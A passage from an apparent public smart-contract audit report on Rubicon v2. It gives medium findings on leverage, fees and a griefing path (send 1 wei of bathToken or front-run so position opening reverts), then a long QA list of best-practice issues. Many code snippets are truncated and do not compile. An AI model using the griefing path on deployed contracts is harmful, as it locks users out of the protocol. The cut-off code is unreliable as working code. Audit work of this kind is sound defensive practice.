You could either not support these type of tokens or add the following requires:

  • Add require(fee != 0) to the buy function after calculating the fee on L338 of the RubiconMarket contract.
  • Add the same kind of require for the makerFee after L346.
  • And also add the same kind of require in the calcAmountAfterFee function after L583.

daoio (Rubicon) acknowledged and commented:

Wow, 2 decimals is something extraordinary lol, but we won’t support gUSD.

HickupHH3 (judge) commented:

FYI, EURS is another stablecoin that has 2 decimals (ETH mainnet + Polygon).

I suppose in general low decimal tokens aren’t really supported.

[M-26] The curve of short leverage position is not smooth and may cause users to open positions that are different from expectations

Submitted by cccz.

The current implementation allows users to open short leverage of 1x.

    function _leverageCheck(uint256 _leverage, bool _long) internal pure {
        uint256 _wad = WAD;
        uint256 _leverageMax = WAD.mul(3);

        _long // long can't be with 1x leverage
            ? require(
                _leverage > _wad && _leverage <= _leverageMax,
                "_leverageCheck{Long}: INVLAID LEVERAGE"
            : require(
                _leverage >= _wad && _leverage <= _leverageMax,
                "_leverageCheck{Short}: INVLAID LEVERAGE"

When the user calls sellAllAmountWithLeverage with leverage == 1.0x , one 100% collateralization and borrowing is performed.

Consider the USDC collateralization factor of 0.7. The user uses 1000 USDC to short WBTC, leverage == 1.0x, the contract will collateralize 1000 USDC to borrow 700 USD WBTC, and then sell WBTC for 700 USDC, leaving the user with a position of 1700 USDC. When leverage == 1.3x, the contract borrows 300 USD worth of WBTC and then sells the WBTC for 300 USDC, leaving the user with a position of 1300 USDC. And when leverage == 1.7x, the contract borrows 700 USD worth of WBTC and then sells the WBTC for 700 USDC, leaving the user with a position of 1700 USDC. We note that when the leverage is 1.0x and 1.7x, the user’s position is the same, and the 1.3x position is smaller than the 1.0x position. This unsmoothed curve of short leverage position may cause the user to open a different position than expected.

Proof of Concept

The following POC shows that when the leverage is 1.0x and 1.7x, the user’s position is the same.

      it("TESTME", async function () {
        const { owner, testCoin, testStableCoin, Position } = await loadFixture(

        await Position.connect(owner).sellAllAmountWithLeverage(

        // fetch position with id 1
        const position = await Position.positions(1);
        expect(await Position.owner()).to.equal(owner.address);
        // position.asset == testStablecoin
        // position.quote == testCoin
        console.log("borrowedAmount : %s",position[2]);
      it("TESTME2", async function () {
        const { owner, testCoin, testStableCoin, Position } = await loadFixture(
        const x1_7 = parseUnits("1.7");

        await Position.connect(owner).sellAllAmountWithLeverage(

        // fetch position with id 1
        const position = await Position.positions(1);
        expect(await Position.owner()).to.equal(owner.address);
        // position.asset == testStablecoin
        // position.quote == testCoin
        console.log("borrowedAmount : %s",position[2]);
  Leverage positions Test
    Pools Utility Test
      Short positions 📉
borrowedAmount : 19444444444444444444
        ✓ TESTME
borrowedAmount : 19444444444444444444
        ✓ TESTME2

Consider no longer supporting 1.0x short leverage.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

Nice find!

[M-27] Both buyAllAmountWithLeverage and sellAllAmountWithLeverage always revert

Submitted by nobody2018, also found by Bauer.

Both buyAllAmountWithLeverage and sellAllAmountWithLeverage always revert. So all users cannot open a leveraged position.

Proof of Concept

openPosition is the entry point for users to open long/short positions, internally calling the _borrowLimit function to calculate an amount of iterations needed to reach desired amount with leverage. The logic of this function is: if the collateral has been provided, then the _maxBorrow function will be called to calculate the maximum amount available to borrow from _bathToken market, and then the returned result will be added to the _loopBorrowed variable.

// check if collateral was already supplied
        uint256 _minted = IERC20(_bathToken).balanceOf(address(this));
    // how much is borrowed on a current loop
        uint256 _loopBorrowed;

        while (_assetAmount <= _desiredAmount) {
            if (_limit == 0) {
        // if collateral already provided
                if (_minted != 0) {
                    uint256 _max = _maxBorrow(_bathToken);

            // take into account previous collateral
                    _loopBorrowed = wmul(_assetAmount, _collateralFactor).add(

Next, look at the code of _maxBorrow:

function _maxBorrow(
        address _bathToken
    ) internal view returns (uint256 _max) {
        (uint256 _err, uint256 _liq, uint256 _shortfall) = comptroller
            .getAccountLiquidity(address(this));		//if address(this) is new user of comptroller, _liq always equal to 0

        require(_err == 0, "_maxBorrow: ERROR");
        require(_liq > 0, "_maxBorrow: LIQUIDITY == 0");	//if _liq equals to 0, tx will revert.
        require(_shortfall == 0, "_maxBorrow: SHORTFALL != 0");

        uint256 _price = oracle.getUnderlyingPrice(CToken(_bathToken));
        _max = (_liq.mul(10 ** 18)).div(_price);
        require(_max > 0, "_maxBorrow: can't borrow 0");

To make the _liq returned by comptroller.getAccountLiquidity(address(this)) be 0, then address(this) must not provide any collateral. In other words, this contract is a new user to the comptroller. Obviously, the Position contract created by the user meets this condition.

The condition for calling _maxBorrow is that IERC20(_bathToken).balanceOf(address(this)) returns a non-zero value. A newly created Position contract does not have any tokens. However, we can transfer 1wei _bathToken to it. This allows the code to execute to _maxBorrow and revert.

There are two ways to transfer _bathToken to the newly created Position:

  1. Front-run buyAllAmountWithLeverage or sellAllAmountWithLeverage.
  2. Once the Position is created, transfer all _bathTokens supported by BathHouseV2 to it. The amount transferred is 1wei.

In fact, _maxBorrow will also revert in normal scenario. Position borrows other tokens resulting in _liq being 0.

We should use comptroller.getAccountLiquidity instead of the balance of _bathToken as the condition for calling _maxBorrow.

--- a/contracts/utilities/poolsUtility/Position.sol
+++ b/contracts/utilities/poolsUtility/Position.sol
@@ -534,7 +534,7 @@ contract Position is Ownable, DSMath {
         uint256 _desiredAmount = wmul(_assetAmount, _leverage);

         // check if collateral was already supplied
-        uint256 _minted = IERC20(_bathToken).balanceOf(address(this));
+        (,uint256 _minted,) = comptroller.getAccountLiquidity(address(this));
        // how much is borrowed on a current loop
         uint256 _loopBorrowed;

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

Medium: loss of functionality due to griefing from external party.

Marking as best because it mentions an additional attack path compared to counterpart.

[M-28] Incorrect fee handling in Position.sol's Market Buy/Sell functions

Submitted by bytes032, also found by zhuXKET, zhuXKET, zhuXKET, qpzm, immeas, immeas, joestakey, kutugu, rbserver, sinarette, R2, carrotsmuggler, cccz, peakbolt, caventa, rvierdiiev, rvierdiiev, anodaram, top1st, RaymondFam, T1MOH, T1MOH and volodya.

The incorrect fee handling in the Position.sol market buy and sell functions can lead to improper fee deductions and wrong trade execution.

Proof of Concept

In Position.t.sol, _rubiconSwap_ executes the order in the RubiconMarket when opening/closing a position.

rubiconSwap can call either marketBuy or marketSell, depending on the circumstances.

The issue is that both marketBuy and marketSell account for fees, where they shouldn’t.

    function _marketBuy(
        address _asset,
        address _quote,
        uint256 _maxFill
    ) internal {
        uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(10000);

        // @audit fee is applied twice?
        uint256 _buyAmount = rubiconMarket.getBuyAmount(
        IERC20(_quote).approve(address(rubiconMarket), _maxFill);

  function _marketSell(
        address _asset,
        address _quote,
        uint256 _minFill
    ) internal {
        // @audit fee?
        uint256 _feeBPS = rubiconMarket.getFeeBPS();
        uint256 _fee = _minFill.mul(_feeBPS).div(10000);
        uint256 _payAmount = rubiconMarket.getPayAmount(
        // @audit doesnt account for maker fee

        // Add the BASE fee to the amount to be paid

        uint256 _assetBalance = IERC20(_asset).balanceOf(address(this));

        /// @dev recalculate fee in _asset form
        _fee = _payAmount.mul(_feeBPS).div(10000);

        if (_assetBalance < _payAmount) {
                _payAmount.sub(_assetBalance).add(_fee) // transfer fee

As discussed with the sponsor, the proper approach for v2 trades is do not account for the fee. Instead, it should be taken from the input amount, unlike in v1 (where it was needed for the input amount to have some addition to paying the fee).

So basically, this fee calculation in Position is useless for v2, and that’s an issue.

Remove all fee calculations from the _marketBuy and _marketSell functions in Position.sol. As per the discussion with the sponsor, fees should not be accounted for in these functions for v2 trades.

daoio (Rubicon) confirmed via duplicate issue #1149

HickupHH3 (judge) decreased severity to Medium commented:

As discussed with the sponsor, the proper approach for v2 trades is do not account for the fee. Instead, it should be taken from the input amount, unlike in v1 (where it was needed for the input amount to have some addition to paying the fee).

I agree that this should be the approach, but because the fee accounting in RubiconMarket has so many errors, I’m unsure what the expected behaviour looks like (should input amounts, min_fill_amt be inclusive or exclusive of fees?). This also affects how I should be de duping the issues as there is some overlap here and there.

#1149 and #1206 fall under this purview of accounting for fees where it shouldn’t be happening (double counting), and that’s why I grouped them together.

Low Risk and Non-Critical Issues

For this audit, 29 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by catellatech received the top score from the judge.

The following wardens also submitted reports: brgltd, adriro, cducrest, immeas, lukris02, tnevler, favelanky, Walter, xmxanuel, 0xAgro, peanuts, Udsen, ast3ros, oualidpro, thekmj, Madalad, CodeFoxInc, DijkstraDev, 0xnev, matrix_0wl, ro1sharkm, 0x6980, MalfurionWhitehat, 0xSmartContract, Kaysoft, 0xmichalis, Sathish9098 and Rolezn.

Dear Rubicon v2 Team, as we have gone through each contract within the scope, we have noticed good practices that have been implemented. However, we have identified some inconsistencies that we recommend addressing. We understand that every team has a different level of good practices, but we believe that at least 90% of the recommendations in the following report should be applied for better gas efficiency, readability, and most importantly, safety.

Note: We have provided a description of the situation and recommendations to follow, including articles and resources we have created to help identify the problem and address it quickly, and to implement them in future projects.

Low Risk Summary

Count Explanation Instances
[L‑08] USE increaseAllowance INSTEAD OF THE FUNCTION approve 1

Non-Critical Summary

Count Explanation Instances
[N‑13] NEED FUZZING TEST All Contracts

Refactor Issues Summary

Count Explanation Instances

Suggestion Details Summary

Count Explanation


Handle ownership transfers with two steps and two transactions. First, allow the current owner to propose a new owner address. Second, allow the proposed owner (and only the proposed owner) to accept ownership, and update the contract owner internally.


25: function setOwner(address owner_) external auth {
        owner = owner_;
        emit LogSetOwner(owner);


Implement zero address check and consider implementing a two step process where the owner nominates an account and the nominated account needs to call an acceptOwnership() function for the transfer of ownership to fully succeed. This ensures the nominated EOA account is a valid and active account.


It is a good practice to give time for users to react and adjust to critical changes. A timelock provides more guarantees and reduces the level of trust required; thus, decreasing risk for users. It also indicates that the project is legitimate (less risk of a malicious owner making a sandwich attack on a user). Consider adding a timelock to the following functions:


25:   function setOwner
955:  function setMinSell

226:  function increaseMargin


The following functions RubiconMarket.setOwner, RubiconMarket.setMinSell, and Position.increaseMargin make critical changes and should include the old and new values of the updated parameters so that users can be aware of the changes made.


The afunctions that change critical parameters should emit events. Events allow capturing of the changed parameters so that off-chain tools/interfaces can register such changes with timelocks. This allows users to evaluate them and consider if they would like to engage/exit based on how they perceive the changes as affecting the trustworthiness of the protocol or profitability of the implemented financial services. The alternative of directly querying on-chain contract state for such changes is not considered practical for most users/usages.

Missing events and timelocks do not promote transparency and if such changes immediately affect users’ perception of fairness or trustworthiness. They could exit the protocol causing a reduction in liquidity, which could negatively impact protocol TVL and reputation.


1466: function setFeeBPS(uint256 _newFeeBPS) external auth returns (bool)
1471: function setMakerFee(uint256 _newMakerFee) external auth returns (bool) 
1476: function setFeeTo(address newFeeTo) external auth returns (bool)

32:  function initialize(address _comptroller, address _pAdmin) external // @audit this function should have a event


Add Event-Emit, for example, in these cases:

+ emit SomeEvent(oldFeeTo, newFeeTo);


Reference: Storage_gaps

You may notice that every contract includes a state variable named __gap. This is an empty reserved space in storage that is put in place in Upgradeable contracts. It allows us to freely add new state variables in the future without compromising the storage compatibility with existing deployments.

A storage gap occurs when a contract is updated and state variables are added or removed. If the position of these variables changes in the new contract, the information that was already stored on the blockchain in the previous position may be exposed and manipulated by an attacker.



674: contract RubiconMarket is MatchingEvents, ExpiringMarket, DSNote{
    function initialize(address _feeTo) public {}

12: contract BathHouseV2{
    function initialize(address _comptroller, address _pAdmin) external {}


Please remember that smart contracts are immutable. You are following an upgradable contract architecture, so it is essential to implement the GAP mechanism in these contracts and maintain order for future upgrades to avoid compromising users’ funds and introducing vulnerabilities in the future.

Consider defining an appropriate storage gap in each upgradeable parent contract at the end of all the storage variable definitions as follows:

uint256[50] __gap; // gap to reserve storage in the contract for future variable additions


According to OpenZeppelin’s (OZ) recommendation, it is recommended to make it impossible for anyone to execute the “initialize” function on an implementation contract by adding an empty constructor with the “initializer” modifier. This way, the implementation contract is automatically initialized upon deployment.

It’s worth nothing that this approach has also been incorporated into the OZ Wizard since the discovery of the UUPS vulnerability. In fact, the code generated by Wizard 19 has been modified to include a constructor that automatically initializes the implementation upon deployment.

This practice also helps prevent possible attacks in which someone tries to perform an initialization transaction before the creator of the contract, which could compromise the security of the contract.


674: contract RubiconMarket is MatchingEvents, ExpiringMarket, DSNote{
    700: function initialize(address _feeTo) public{}

12: contract BathHouseV2
    32: function initialize(address _comptroller, address _pAdmin) external {


The V2Migrator contract, on line 4, imports the SafeERC20 library from OpenZeppelin but does not use it. According to a comment on line 29, every pool in V1 that wants to migrate to V2 should be able to do so with the migrate function. In the same comment, they refer to USDC, which, for example, does not follow the ERC20 standard, and many other tokens don’t either. You guys should implement the SafeERC20 library from OZ in this contract.


// @audit implement this library in the migrate function
4: import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";


Implement the SafeERC20 library from OpenZepplin in the V2Migrator.sol contract.

[L-08] USE increaseAllowance INSTEAD OF THE FUNCTION approve

Use increaseAllowance instead of the approve function since this is an alternative to approve that can be used as a mitigation for problems described in IERC20-approve.


/// OpenZeppelin docs
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
// @audit use `increaseAllowance`
53: underlying.approve(bathTokenV2, amountWithdrawn);


Use increaseAllowance instead of the approve function from OpenZepplin in the V2Migrator.sol contract.


Some tokens like USDT do not work when changing the allowance from an existing non-zero allowance value. They must first be approved by zero and then the actual allowance must be approved.


53: underlying.approve(bathTokenV2, amountWithdrawn);

A number of features within the vaults will not work if the approve function reverts.


It is recommended to set the allowance to zero before increasing the allowance and use safeIncreaseAllowance.


The source files have different solidity compiler ranges referenced. This leads to potential security flaws between deployed contracts depending on the compiler version chosen for any particular file. It also greatly increases the cost of maintenance, as different compiler versions have different semantics and behavior.


2: pragma solidity ^0.8.9;

2: pragma solidity 0.8.17; // @audit this an another three contract have this pragma version 

2: pragma solidity ^0.8.0;


We recommend to fix a definite compiler range that is consistent between contracts and upgrade any affected contracts to conform to the specified compiler.


On several locations in the code, precautions are not being taken for not dividing by 0; this will revert the code. These functions can be called with 0 value in the input; this value is not checked for being bigger than 0, which means, in some scenarios, this can potentially trigger a division by zero.


41: fees[i] = (tokenAmounts[i] * feeValue) / feeType;


We recommend making sure division by 0 won’t occur by checking the variables beforehand and handling this edge case.


At the start of the project, the system may need to be stopped or upgraded. I suggest you have a script beforehand and add it to the documentation. This can also be called an EMERGENCY STOP (CIRCUIT BREAKER) PATTERN. Use the following example to implement it into in the BathHouseV2.sol, claimRewards function and RubiconMarket.sol in the following functions: sellAllAmount, buyAllAmount.

Emergency Stop Pattern Example


It is advisable to avoid using floating pragmas in contracts that are not libraries.

While floating pragmas make sense in the context of libraries, allowing them to be included in multiple different versions of applications, they can pose a security risk in application implementations.

There is a possibility that a vulnerable compiler version may be accidentally selected or security tools may fallback to an older compiler version, resulting in verification of a different EVM compilation that is ultimately deployed on the blockchain.

Therefore, it is recommended to pin to a specific compiler version to ensure the security of the contract.


2: pragma solidity ^0.8.9;


We recommend following your own best practice patterns in RubiconMarket.sol, as they do in BathHouseV2.sol and the rest of contracts, for interfaces and contracts.

- 2: pragma solidity ^0.8.9;
+ 2: pragma solidity 0.8.9;


It is recommended to update the version of Solidity being used, as an old version is currently in use. It is advisable to consider using the latest version, 0.8.19. You can check the improvements and bug fixes offered by the new versions here


2: pragma solidity ^0.8.9;

2: pragma solidity 0.8.17;

2: pragma solidity 0.8.17;

2: pragma solidity 0.8.17;

2: pragma solidity 0.8.17;


- 2: pragma solidity ^0.8.9;
+ 2: pragma solidity 0.8.19;

- 2: pragma solidity 0.8.17;
+ 2: pragma solidity 0.8.19;


To improve code readability, it is recommended to use specific names when importing instead of regular ones.


11: import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
12: import "@openzeppelin/contracts/utils/StorageSlot.sol";

4: import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
5: import "./compound-v2-fork/InterestRateModel.sol";
6: import "./compound-v2-fork/CErc20Delegator.sol";
7: import "./compound-v2-fork/Comptroller.sol";
8: import "./compound-v2-fork/Unitroller.sol";
9: import "./periphery/BathBuddy.sol";

4: import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
5: import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
6: import "./compound-v2-fork/CTokenInterfaces.sol";

4: import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
5: import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
6: import "@openzeppelin/contracts/utils/math/SafeMath.sol";
7: import "@openzeppelin/contracts/access/Ownable.sol";
8: import "../../compound-v2-fork/Comptroller.sol";
9: import "../../compound-v2-fork/PriceOracle.sol";
10: import "../../BathHouseV2.sol";
11: import "../../RubiconMarket.sol";

4: import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
5: import "./RubiconRouter.sol";


-11: import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
+11: import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";


In the folowing functions below, there are some checks that can be made in order to achieve more safe and efficient code.

Address zero check can be added in the function offer, RubiconMarket contract to ensure the address owner and recipient aren’t address(0).


25:     function setOwner(address owner_) external auth {
            owner = owner_; // @audit Check owner_ it's not address 0
            emit LogSetOwner(owner);
511:    function offer(
            uint256 pay_amt,
            ERC20 pay_gem,
            uint256 buy_amt,
            ERC20 buy_gem,
            address owner,  // @audit Check that it's not address 0
            address recipient // @audit Check that it's not address 0
802:    function offer(
            uint256 pay_amt, //maker (ask) sell how much
            ERC20 pay_gem, //maker (ask) sell which token
            uint256 buy_amt, //maker (ask) buy how much
            ERC20 buy_gem, //maker (ask) buy which token
            uint256 pos, //position to insert offer, 0 should be used if unknown
            address owner,  // @audit Check that it's not address 0
            address recipient // @audit Check that it's not address 0

// @audit also the same issue in the BathHouseV2 contract in the line 32
32: function initialize(address _comptroller, address _pAdmin) external                


It is recommended that Solidity contracts are fully annotated using NatSpec for all public interfaces (everything in the ABI), as it is clearly stated in the Solidity official documentation. In complex projects such as Defi, the interpretation of all functions and their arguments and returns is important for code readability and auditability.


NatSpec comments should be increased in contracts


In the main contract RubiconMarket.sol, there are many contracts/libraries used in the system. It is recommended to put the most used ones in one file (for example SafeMath.sol, DSAuth.sol, Events.sol) and use inheritance to access these values.

This helps with readability and easier maintenance for future changes. It also helps with any issues, as some of these hard-coded contracts are admin contracts.

SafeMath.sol, DSAuth.sol, Events.sol Use and import these files in contracts that require access to these values. This is just a suggestion, in some use cases this may result in higher gas usage in the distribution.


// @audit Create a specific file for these cases and use inheritance.
 /// @notice DSAuth events for authentication schema
 15: contract DSAuthEvents {}

 /// @notice DSAuth library for setting owner of the contract
 /// @dev Provides the auth modifier for authenticated function calls
 22:contract DSAuth is DSAuthEvents {}
 /// @notice DSMath library for safe math without integer overflow/underflow
 44: contract DSMath {}

 /// @notice Events contract for logging trade activity on Rubicon Market
 /// @dev Provides the key event logs that are used in all core functionality of exchanging on the Rubicon Market
 94: contract EventfulMarket {}


We strongly recommend implementing each contract in a separate file. This will help you avoid errors and confusion in your project, and maintain a more organized and readable code structure. Following these good programming and organizational practices will help you build a solid and scalable project, which will be easier to maintain and update in the future.


During the smart contract audit, the absence of Natspec documentation has been detected in several critical functions. It is important to note that this lack of description makes it difficult to understand the functionality of the code and therefore may increase the risk of errors in the future. It is strongly recommended to include detailed documentation in all contract functions to ensure long-term readability and maintainability.


// @audit Make sure to implement Natspec documentation in critical functions.

    function kill(bytes32 id) external virtual {

    function make(
        ERC20 pay_gem,
        ERC20 buy_gem,
        uint128 pay_amt,
        uint128 buy_amt
    ) external virtual returns (bytes32 id) {

    function take(bytes32 id, uint128 maxTakeAmount) external virtual {
        require(buy(uint256(id), maxTakeAmount));

    function _next_id() internal returns (uint256) {
        return last_offer_id;

    function calcAmountAfterFee(
        uint256 amount
    ) public view returns (uint256 _amount) {
        require(amount > 0);
        _amount = amount;
        _amount -= mul(amount, feeBPS) / 100_000;

        if (makerFee() > 0) {
            _amount -= mul(amount, makerFee()) / 100_000;

    function make(
        ERC20 pay_gem,
        ERC20 buy_gem,
        uint128 pay_amt,
        uint128 buy_amt
    ) public override returns (bytes32) {

    function take(bytes32 id, uint128 maxTakeAmount) public override {
        require(buy(uint256(id), maxTakeAmount));

    function kill(bytes32 id) external override {


Implement the NatSpec Format of Solidity.

/// @notice Calculate tree age in years, rounded up, for live trees
/// @dev The Alexandr N. Tetearing algorithm could increase precision
/// @param rings The number of rings from dendrochronological sample
/// @return Age in years, rounded up for partial years


Scientific notation (e.g. 1E18) is clearer and easier to read than exponentiation (e.g. 10**18). Additionally, scientific notation is widely used in the Ethereum development community and is considered a best practice for making code more readable and understandable.


// @audit Refactorize scientific notation
    74: uint256 constant WAD = 10 ** 18;
    75: uint256 constant RAY = 10 ** 27; 
    1059: / 10 ** 9;
    1099: mul(buy_amt, 10 ** 9)
    1101: / 10 ** 9
    1142: mul(pay_amt, 10 ** 9)
    1144: / 10 ** 9
    1175: mul(buy_amt, 10 ** 9)
    1177: / 10 ** 9

317: _max = (_liq.mul(10 ** 18)).div(_price);
331: .div(10 ** 18);


-74: uint256 constant WAD = 10 ** 18;
+74: uint256 constant WAD = 1e18; 


Smart contracts often contain numerous implemented code fragments. It is advisable to consider removing unnecessary code or implementing it correctly before deploying to the main network. The presence of inconsistent code makes the project difficult to read and can lead to serious errors. Therefore, it is recommended to carefully review the code and make necessary adjustments to ensure quality and security before deploying to the main network.


Remove commented code File RubiconMarket.sol


While auditing, it was noticed that the recommended Solidity standards for Natspec were not being followed correctly.


// @audit so many instances with these issues
250: // /// @notice Modifier that checks the user to make sure they own the offer and its valid before they attempt to cancel it
666: /// event LogInsert(address keeper, uint256 id);
718: // // After close, anyone can cancel an offer


Implement the NatSpec Format of Solidity.


According to the Solidity style guide, functions should be laid out in the following order:

  • constructor()
  • receive()
  • fallback()
  • external
  • public
  • internal
  • private

Solidity Order Functions

Functions should be grouped according to their visibility and ordered: within a grouping, place the view and pure functions last


Avoid floating pragmas for non-library contracts.

While floating pragmas makes sense for libraries to allow them to be included with multiple different versions of applications, it may be a security risk for application implementations.

A known vulnerable compiler version may accidentally be selected or security tools might fall-back to an older compiler version ending up checking a different EVM compilation that is ultimately deployed on the blockchain.

It is recommended to pin to a concrete compiler version.


- pragma solidity ^0.8.9;
+ pragma solidity 0.8.9;


We recommend the use of fuzzing tests, especially in finance oriented protocols, due to the complexity and risk involved in handling large amounts of money in these smart contracts. Finance oriented contracts are critical in terms of security and accuracy, as any errors or vulnerabilities could be exploited by malicious attackers to steal funds or cause significant damage.

Fuzzing tests are an important tool for identifying possible vulnerabilities in the code through the automatic and random generation of input data in the contract, which can help avoid costly errors in production.


Use should fuzzing test like Echidna or Foundry.


Short-circuiting is a solidity contract development model that uses OR/AND logic to sequence different cost operations. It puts low gas cost operations in the front and high gas cost operations in the back, so that if the front is low If the cost operation is feasible, you can skip (short-circuit) the subsequent high-cost Ethereum virtual machine operation.

//f(x) is a low gas cost operation 
//g(y) is a high gas cost operation 

//Sort operations with different gas costs as follows 
f(x) || g(y) 
f(x) && g(y)


325:    if (
            quantity == 0 ||
            spend == 0 ||
            quantity > _offer.pay_amt ||
            spend > _offer.buy_amt
349:    if (_offer.owner == address(0) && getRecipient(id) != address(0))
1197:   if (
            isActive(id) &&
            offers[id].pay_amt < _dust[address(offers[id].pay_gem)]
1217:   while (top != 0 && _isPricedLtOrEq(id, top))
1229:   while (pos != 0 && !isActive(pos))
1244:   while (pos != 0 && _isPricedLtOrEq(id, pos))
1252:   while (pos != 0 && !_isPricedLtOrEq(id, pos))                
1319:   if (t_pay_amt == 0 || t_buy_amt == 0)
1324:   if (
            t_buy_amt > 0 &&
            t_pay_amt > 0 &&
            t_pay_amt >= _dust[address(t_pay_gem)]
1452:   while (uid > 0 && uid != id)  


176:    if (i.add(1) == vars.limit && vars.lastBorrow != 0)
391:    if (
            IERC20(_bathTokenAsset).balanceOf(address(this)) == 0 &&
            borrowBalance(_bathTokenAsset) == 0


Since version 0.8.4 for appending bytes, bytes.concat() can be used instead of abi.encodePacked().


369:  keccak256(abi.encodePacked(_offer.pay_gem, _offer.buy_gem))
400:  keccak256(abi.encodePacked(_offer.pay_gem, _offer.buy_gem))
423:  keccak256(abi.encodePacked(_offer.pay_gem, _offer.buy_gem))
442:  keccak256(abi.encodePacked(_offer.pay_gem, _offer.buy_gem))
476:  keccak256(abi.encodePacked(_offer.pay_gem, _offer.buy_gem))
555:  keccak256(abi.encodePacked(pay_gem, buy_gem))


Since this is a low level language that is more difficult to parse by readers, include extensive documentation, comments on the rationale behind its use, clearly explaining what each assembly instruction does

This will make it easier for users to trust the code, for reviewers to validate the code, and for developers to build on or update the code.

Note that using Aseembly removes several important security features of Solidity, which can make the code more insecure and more error-prone.


648:    assembly {
            foo := calldataload(4)
            bar := calldataload(36)
            wad := callvalue()

367:    assembly {
            switch _initBathTokenAmount
            case 0 {
                _bathTokenAmount := _currentBathTokenAmount
            default {
                _bathTokenAmount := sub(


Having multiple functions with the same name in a smart contract can be dangerous or not a good practice for several reasons:

  • Confusion: If there are several functions with the same name, it can be confusing for developers and users who are interacting with the smart contract. This can lead to errors and misunderstandings in the use of the contract.
  • Security vulnerabilities: If multiple functions are defined with the same name, attackers can attempt to exploit this vulnerability to access or modify data or functionalities of the smart contract.
  • Network overload: If there are multiple functions with the same name, there may be an impact on the efficiency and speed of the contract, as the network may be confused in trying to determine which function should be executed.


// @audit Refactorize
 674: contract RubiconMarket is MatchingEvents, ExpiringMarket, DSNote {
    function offer(
        uint256 pay_amt, //maker (ask) sell how much
        ERC20 pay_gem, //maker (ask) sell which token
        uint256 buy_amt, //maker (ask) buy how much
        ERC20 buy_gem //maker (ask) buy which token
    ) external can_offer returns (uint256) {

    function offer(
        uint256 pay_amt, //maker (ask) sell how much
        ERC20 pay_gem, //maker (ask) sell which token
        uint256 buy_amt, //maker (ask) buy how much
        ERC20 buy_gem, //maker (ask) buy which token
        uint pos, //position to insert offer, 0 should be used if unknown
        bool rounding
    ) external can_offer returns (uint256) {

    // Make a new offer. Takes funds from the caller into market escrow.
    function offer(
        uint256 pay_amt, //maker (ask) sell how much
        ERC20 pay_gem, //maker (ask) sell which token
        uint256 buy_amt, //maker (ask) buy how much
        ERC20 buy_gem, //maker (ask) buy which token
        uint256 pos, //position to insert offer, 0 should be used if unknown
        address owner,
        address recipient
    ) external can_offer returns (uint256) {

    function offer(
        uint256 pay_amt, //maker (ask) sell how much
        ERC20 pay_gem, //maker (ask) sell which token
        uint256 buy_amt, //maker (ask) buy how much
        ERC20 buy_gem, //maker (ask) buy which token
        uint256 pos, //position to insert offer, 0 should be used if unknown
        bool matching, //match "close enough" orders?
        address owner, // owner of the offer
        address recipient // recipient of the offer's fill
    ) public can_offer returns (uint256) {
        require(!locked, "Reentrancy attempt");
        require(_dust[address(pay_gem)] <= pay_amt);

        /// @dev currently matching is perma-enabled
        // if (matchingEnabled) {
        // }
        // return super.offer(pay_amt, pay_gem, buy_amt, buy_gem);


To avoid problems related to function overloading in smart contracts, it is recommended to follow best programming practices.

Some recommendations are:

  • Name functions in a descriptive and unique way to avoid function overloading.
  • Use input arguments with different data types to distinguish functions.
  • Avoid unnecessary function overloading, i.e., define additional functions only if necessary and not just for convenience or ease of programming.
  • Clearly document the functions and their uses to avoid confusion.

By following these recommendations, developers can avoid function overloading and create smarter and more secure contracts that are easier to use.

Improve the efficiency and stability of your code by avoiding unbounded while loops. Instead of using a while loop for unbounded iterations, it is recommended to use other loop structures like for that have a clearer structure and can provide better control flow for the loop. Don’t write loops that are unbounded as this can hit the gas limit, causing your transaction to fail. For the reason above, while and do-while loops are rarely used.


// @audit Avoid unbounded loops
    1037: while (pay_amt > 0) 
    1077: while (buy_amt > 0)
    1130: while (pay_amt > offers[offerId].buy_amt)
    1163: while (buy_amt > offers[offerId].pay_amt)
    1217: while (top != 0 && _isPricedLtOrEq(id, top))
    1229: while (pos != 0 && !isActive(pos))
    1244: while (pos != 0 && _isPricedLtOrEq(id, pos))
    1252: while (pos != 0 && !_isPricedLtOrEq(id, pos))
    1289: while (_best[address(t_buy_gem)][address(t_pay_gem)] > 0)
    1452: while (uid > 0 && uid != id)

    541: while (_assetAmount <= _desiredAmount) 


Avoid unbounded loops. As mentioned before, it is important to avoid unbounded while loops in your smart contracts. If you need to make a loop, make sure that the number of iterations is limited and known in advance.


It can’t be recovered if the tokens accidentally arrive at the V2Migrator contract address. In line 65, it is noted that BATH TOKENS V2 may get stuck, but no token recovery implementation is implemented if this happens. We recommend adding a recovery code to this contract.


Add this code:

  * @notice Sends ERC20 tokens trapped in contract to external address
  * @dev Onlyowner is allowed to make this function call
  * @param account is the receiving address
  * @param externalToken is the token being sent
  * @param amount is the quantity being sent
  * @return boolean value indicating whether the operation succeeded.
function rescueERC20(address account, address externalToken, uint256 amount) public onlyOwner returns (bool) {
    IERC20(externalToken).transfer(account, amount);
    return true;


The style guide says that, within a contract, the ordering should be:

  1. Type declarations
  2. State variables,
  3. Events
  4. Modifiers
  5. Functions

But the contract(s) below do not follow this ordering:


Proper use of _ as a function name prefix and a common pattern is to prefix internal and private function names with _. This pattern is correctly applied in all contracts; however, there are some inconsistencies in just these contracts:


// @audit Refactorize
35: function isAuthorized(address src) internal view returns (bool) {

125: function openPosition(
        address asset,
        address quote,
        uint256 initMargin,
        uint256 leverage
    ) internal returns (bool OK) {


-35: function isAuthorized(address src) internal view returns (bool)
+35: function _isAuthorized(address src) internal view returns (bool) 


Consider using underscores for number values to improve readability.

481: uint256 _fee = _minFill.mul(_feeBPS).div(10000);
490:  _fee = _payAmount.mul(_feeBPS).div(10000);


